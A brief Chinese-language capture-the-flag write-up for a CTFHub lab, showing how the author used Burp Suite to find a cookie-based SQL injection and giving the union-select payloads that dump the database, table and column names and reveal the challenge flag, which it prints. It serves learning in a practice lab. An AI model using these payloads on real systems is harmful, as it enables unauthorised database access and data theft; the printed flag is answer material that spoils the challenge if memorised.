小白一个,如有错误请指正!
解法一:使用Burpsuite抓包
1.设置好Burpsuite后开始抓包 鼠标右键点击Send to Repeater
2.在Repeater界面发送数据包,发现可以看到返回的数据
3.可以发现Cookie的id可以传值,那我们通过Cookie进行注入 发现只有2个字段
有回显
有回显
没有回显
4.爆数据库
id=123 union select 1,database()#
5.爆表名
id=123 union select 1,group_concat(table_name) from information_schema.tables where table_schema = 'sqli'
6.爆字段
id=123 union select 1,group_concat(column_name) from information_schema.columns where table_name = 'mfzmvlaeny'
7.爆flag
id=123 union select 1,wsraaoxtwe from sqli.mfzmvlaeny
成功拿到flag
ctfhub{8c252e1556403bd315451c7a}
目前只知道一种解法,后续更新~